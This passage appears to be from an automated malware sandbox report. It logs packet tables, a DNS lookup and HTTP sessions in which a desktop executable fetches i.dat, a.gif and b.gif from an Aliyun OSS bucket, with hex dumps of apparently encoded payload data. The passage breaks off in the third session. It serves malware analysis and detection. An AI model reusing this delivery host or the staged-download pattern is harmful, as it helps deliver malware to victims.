                                            Jan 9, 2025 04:28:43.333733082 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:43.422297955 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:43.422331095 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:43.422353983 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:43.422374964 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:43.422378063 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:43.422537088 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:43.422548056 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:43.422595024 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:43.422601938 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:43.422724009 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:43.631335020 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:43.631406069 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:43.723495960 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:43.723505020 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:43.723522902 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:43.723656893 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:43.821373940 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:43.821382046 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:43.821396112 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:43.821414948 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:43.821419001 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:43.821552038 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:43.821558952 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:43.821625948 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:44.131288052 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:44.239417076 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:44.963725090 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:44.963761091 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:45.162230968 CET49686443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:45.162281990 CET4434968659.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:45.162372112 CET49686443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:45.162631035 CET49686443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:45.162648916 CET4434968659.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:46.426456928 CET4434968659.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:46.426527977 CET49686443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:46.427073002 CET49686443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:46.427086115 CET4434968659.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:46.427251101 CET49686443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:46.427259922 CET4434968659.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:46.762053967 CET4434968659.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:46.762084007 CET4434968659.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:46.762130976 CET49686443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:46.762164116 CET4434968659.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:46.762187958 CET49686443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:46.762202978 CET49686443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:46.762384892 CET4434968659.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:46.762434959 CET49686443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:46.762495995 CET4434968659.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:46.762541056 CET49686443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:46.763386011 CET4434968659.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:46.763457060 CET49686443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:46.874125004 CET4434968659.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:46.874274969 CET49686443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:46.874322891 CET4434968659.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:46.874372005 CET49686443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:46.875004053 CET4434968659.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:46.875056028 CET49686443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:46.875067949 CET4434968659.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:46.875113010 CET4434968659.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:46.875133038 CET49686443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:46.875161886 CET49686443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:46.875463009 CET49686443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:46.875479937 CET4434968659.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:46.890233040 CET49687443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:46.890284061 CET4434968759.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:46.890374899 CET49687443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:46.890569925 CET49687443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:46.890583038 CET4434968759.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:48.194096088 CET4434968759.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:48.194160938 CET49687443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:48.194648981 CET49687443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:48.194660902 CET4434968759.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:48.194828033 CET49687443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:48.194833994 CET4434968759.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:48.530347109 CET4434968759.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:48.530380964 CET4434968759.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:48.530529022 CET49687443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:48.530529022 CET49687443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:48.530545950 CET4434968759.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:48.530582905 CET49687443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:48.530702114 CET4434968759.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:48.530750990 CET49687443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:48.530756950 CET4434968759.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:48.530790091 CET49687443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:48.531023026 CET4434968759.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:48.531060934 CET49687443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:48.531128883 CET4434968759.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:48.531172991 CET49687443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:48.531208992 CET49687443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:48.531218052 CET4434968759.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:48.531229973 CET49687443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:48.531258106 CET49687443192.168.2.759.110.190.44
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 9, 2025 04:27:26.991239071 CET53650821.1.1.1192.168.2.7
                                            Jan 9, 2025 04:28:28.391628027 CET5699653192.168.2.71.1.1.1
                                            Jan 9, 2025 04:28:28.444292068 CET53569961.1.1.1192.168.2.7
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Jan 9, 2025 04:28:28.391628027 CET192.168.2.71.1.1.10xad7fStandard query (0)a8mw1y.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Jan 9, 2025 04:28:28.444292068 CET1.1.1.1192.168.2.70xad7fNo error (0)a8mw1y.oss-cn-beijing.aliyuncs.com59.110.190.44A (IP address)IN (0x0001)false
                                            • a8mw1y.oss-cn-beijing.aliyuncs.com
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.74968159.110.190.444434476C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            TimestampBytes transferredDirectionData
                                            2025-01-09 03:28:29 UTC111OUTGET /i.dat HTTP/1.1
                                            User-Agent: GetData
                                            Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                            Cache-Control: no-cache
                                            2025-01-09 03:28:30 UTC557INHTTP/1.1 200 OK
                                            Server: AliyunOSS
                                            Date: Thu, 09 Jan 2025 03:28:29 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 512
                                            Connection: close
                                            x-oss-request-id: 677F425D8797BE32335B61A7
                                            Accept-Ranges: bytes
                                            ETag: "C3BE870A726F627202B33B6AAD385CC2"
                                            Last-Modified: Wed, 08 Jan 2025 11:05:12 GMT
                                            x-oss-object-type: Normal
                                            x-oss-hash-crc64ecma: 253241388760715353
                                            x-oss-storage-class: Standard
                                            x-oss-ec: 0048-00000113
                                            Content-Disposition: attachment
                                            x-oss-force-download: true
                                            Content-MD5: w76HCnJvYnICsztqrThcwg==
                                            x-oss-server-time: 16
                                            2025-01-09 03:28:30 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 51 08 5d 47 76 3e 69 28 5b 5b 05 4b 25 66 29 2e 47 44 47 40 27 6e 21 2c 45 55 59 42 21 31 6c 21 4e 4c 0e 40 6e 27 29 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 4e 52 52 56 25 6c 79 79 18 41 14 0e 3f 77 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 52 0b 5e 44 75 3d 6a 2b 58 58 06 48 26 65 2a 2d 44 47 44 43 24 6d 22 2f 46 56 5a 41 22 32 6f 22 4d 4f 0d 41 6f 26 28 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 4f 53 53 57 24 6d 78 78 19 40 15 0f 3e 76 21
                                            Data Ascii: l%00Q]Gv>i([[K%f).GDG@'n!,EUYB!1l!NL@n')&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyA?w aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33R^Du=j+XXH&e*-DGDC$m"/FVZA"2o"MOAo&('''''''''''''''''''''''''''''''''OSSW$mxx@>v!


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.74968259.110.190.444434476C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            TimestampBytes transferredDirectionData
                                            2025-01-09 03:28:31 UTC111OUTGET /a.gif HTTP/1.1
                                            User-Agent: GetData
                                            Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                            Cache-Control: no-cache
                                            2025-01-09 03:28:31 UTC546INHTTP/1.1 200 OK
                                            Server: AliyunOSS
                                            Date: Thu, 09 Jan 2025 03:28:31 GMT
                                            Content-Type: image/gif
                                            Content-Length: 135589
                                            Connection: close
                                            x-oss-request-id: 677F425FF326DB39341EAF5B
                                            Accept-Ranges: bytes
                                            ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                            Last-Modified: Wed, 08 Jan 2025 11:04:16 GMT
                                            x-oss-object-type: Normal
                                            x-oss-hash-crc64ecma: 8642451798640735006
                                            x-oss-storage-class: Standard
                                            x-oss-ec: 0048-00000104
                                            Content-Disposition: attachment
                                            x-oss-force-download: true
                                            Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                            x-oss-server-time: 22
                                            2025-01-09 03:28:31 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                            Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                            2025-01-09 03:28:31 UTC4096INData Raw: 92 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c
                                            Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                                            2025-01-09 03:28:31 UTC4096INData Raw: 6c 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90
                                            Data Ascii: lIl]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                                            2025-01-09 03:28:32 UTC4096INData Raw: 75 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91
                                            Data Ascii: uc}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                                            2025-01-09 03:28:32 UTC4096INData Raw: b7 ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1
                                            Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`
                                            2025-01-09 03:28:32 UTC4096INData Raw: b7 d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1
                                            Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                                            2025-01-09 03:28:32 UTC4096INData Raw: ce d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7
                                            Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                                            2025-01-09 03:28:32 UTC4096INData Raw: db 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a
                                            Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_
                                            2025-01-09 03:28:32 UTC4096INData Raw: 56 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2
                                            Data Ascii: VZ~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJL
                                            2025-01-09 03:28:32 UTC4096INData Raw: 65 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd
                                            Data Ascii: eWUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.74968359.110.190.444434476C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            TimestampBytes transferredDirectionData
                                            2025-01-09 03:28:33 UTC111OUTGET /b.gif HTTP/1.1
                                            User-Agent: GetData
                                            Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                            Cache-Control: no-cache
                                            2025-01-09 03:28:34 UTC547INHTTP/1.1 200 OK
                                            Server: AliyunOSS
                                            Date: Thu, 09 Jan 2025 03:28:34 GMT
                                            Content-Type: image/gif
                                            Content-Length: 125333
                                            Connection: close
                                            x-oss-request-id: 677F42616AD6D5343207A7BA
                                            Accept-Ranges: bytes
                                            ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                            Last-Modified: Wed, 08 Jan 2025 11:04:16 GMT
                                            x-oss-object-type: Normal
                                            x-oss-hash-crc64ecma: 10333201072197591521
                                            x-oss-storage-class: Standard
                                            x-oss-ec: 0048-00000104
                                            Content-Disposition: attachment
                                            x-oss-force-download: true
                                            Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                            x-oss-server-time: 29
